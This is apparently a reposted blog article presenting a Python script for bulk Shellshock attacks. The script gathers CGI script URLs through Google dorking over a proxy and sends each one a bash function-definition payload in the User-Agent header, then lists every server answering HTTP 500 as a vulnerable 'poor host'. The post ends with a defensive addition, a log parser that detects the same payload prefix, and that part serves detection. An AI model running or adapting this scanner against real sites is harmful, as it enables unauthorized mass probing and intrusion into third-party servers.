Bash Shellshock (Bash Remote Code Execution) Vulnerability Bulk Exploitation Script

Posted by jopen 11 years ago | 34K views | Linux Shellshock

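The Bash remote code execution vulnerability is indeed far more powerful than Heartbleed, but its scope of impact is not very broad. Still, the end of yesterday's analysis article, "Bash Remote Code Execution Vulnerability Analysis", raised the question of exploiting this vulnerability in bulk.
The very simplest method is to use search-engine hacking techniques. Here I use Google Hacking syntax combined with the Google API to collect links. Within China, though... a proxy is needed.
The proxy in the program is my local goagent proxy, on port 8087. The idea for detecting the vulnerability is also simple: here I judge directly from the server's return code.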

That is the whole idea. As usual, the code follows:

    #coding=utf-8  
    import requests  
    import json  
    import sys  
    import threading  
    import socket  
    vul_res = []  
    class GoogleURLProvider():  
        def __init__(self,pageCount,proxies):  
            self.pageCount = pageCount #number of pages to query  
            self.keywords = r'inurl:cgi-bin filetype:sh'  
            self.apiurl = "https://ajax.googleapis.com/ajax/services/search/web"  
            self.proxies = proxies  
        def getRequest(self,url):  
            return requests.get(url,proxies=self.proxies,verify=False)  

        def getUrls(self):  
            ret_list = []  
            tmp_list = []  
            for x in xrange(0,self.pageCount):  
                url = "{apiurl}?v=1.0&q={keywords}&rsz=8&start={pageCount}".format(apiurl=self.apiurl,keywords=self.keywords,pageCount=x)  
                try:  
                    r = self.getRequest(url)      
                    results = json.loads(r.text)  
                    if not results:  
                        continue  
                    infos = results['responseData']['results']  
                    if infos:  
                        for i in infos:  
                            tmp_list.append(i['url'])  
                except Exception, e:  
                    continue  
            ret_list = ret_list + tmp_list  
            return ret_list  

    class BashRCEDetector():  
        def __init__(self,urls):  

            self.urls = urls  
        def detector(self):  
            global vul_res  

            for x in self.urls:  
                #run in multiple threads  
                each = EachWorker(x)  
                each.start()  
                each.join()  


    '''Thread worker class'''  
    class EachWorker(threading.Thread):  
        def __init__(self,url):  
            threading.Thread.__init__(self)  
            self.url = url  
        def run(self):  
            global vul_res  
            useragent_header = {  
                'User-Agent':'''''() { 1;}; echo 'eee'''  
            }  
            try:  
                r = requests.get(self.url,headers = useragent_header,timeout=8)  
                if r.status_code == 500:  
                    print "{url} has Bash RCE vulnerability".format(url=self.url)  
                    vul_res.append(self.url)  
                else:  
                    pass  
            except socket.timeout, e:  
                pass  
            except requests.exceptions.Timeout, e:  
                pass  
            except requests.exceptions.ConnectionError, e:  
                pass  


    if __name__ == '__main__':  
        print 'Powered by:Exploit QQ:739858341'  
        print 'This is a program which you can use to scan the BashRCE vulnerability\nScanner working,please wait....'  
        if len(sys.argv) != 2:  
            print 'Usage:python BashRCEScanner <google pageCount>'  
            sys.exit()  
        #goagent proxy  
        #modify here: add your own proxy and it is ready to use  
        proxies = {  
        'http':"http://127.0.0.1:8087",  
        'https':"http://127.0.0.1:8087"  
        }  
        url_res = []  
        vul_guys = []  
        urlgetter = GoogleURLProvider(int(sys.argv[1]),proxies)  
        url_res = urlgetter.getUrls()  

        bash_detector = BashRCEDetector(url_res)  
        bash_detector.detector()  
        if len(vul_res) == 0:  
            print 'This group have no vulnerability'  
        else:  
            print 'Find %d poor host(s)' % len(vul_res)   

Screenshot of a run:

20140926112220982.gif

Source: http://blog.csdn.net/u011721501/article/details/39577393
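
For the defending side, an added example (not part of the original post or its author's code): it scans web-server access logs for the function-definition prefix `() {` that the script above places in the User-Agent header, and marks hits that were answered with HTTP 500, the signal that script treats as vulnerable. The log lines are constructed samples in Apache Combined Log Format, and the function and field names are assumptions of this example.

```python
import re

# Apache/nginx Combined Log Format:
# host ident user [time] "request" status bytes "referer" "user-agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(
    r'(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED
)
# Vulnerable bash parses an environment value that begins with "() {" as a
# function definition. Match it anywhere in a field to stay conservative.
FUNC_DEF_RE = re.compile(r'\(\)\s*\{')

# Constructed sample lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Sep/2014:11:20:01 +0800] "GET /cgi-bin/status.sh HTTP/1.1" 500 612 "-" "() { 1;}; echo \'eee\'"',
    '198.51.100.7 - - [26/Sep/2014:11:20:02 +0800] "GET /cgi-bin/info.sh HTTP/1.1" 200 88 "-" "() { 1;}; echo \'eee\'"',
    '192.0.2.15 - - [26/Sep/2014:11:21:40 +0800] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.15 - - [26/Sep/2014:11:22:03 +0800] "GET /cgi-bin/status.sh HTTP/1.1" 500 612 "-" "curl/7.35.0"',
]

def find_shellshock_probes(lines):
    """Return one finding per log line whose request, Referer or User-Agent
    carries a bash function-definition prefix."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not Combined Log Format: skip instead of guessing
        host, when, request, status, referer, agent = m.groups()
        fields = [name for name, value in
                  (("request", request), ("referer", referer), ("agent", agent))
                  if FUNC_DEF_RE.search(value)]
        if fields:
            findings.append({
                "host": host, "time": when, "request": request, "fields": fields,
                # HTTP 500 is what the scanner above reports as "vulnerable"
                "scanner_would_flag": status == "500",
            })
    return findings

if __name__ == "__main__":
    for finding in find_shellshock_probes(SAMPLE_LOG):
        print(finding)
```

A hit with `scanner_would_flag` set is the first place to check the installed bash version; a 500 on its own, without the prefix in any field, is not reported.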
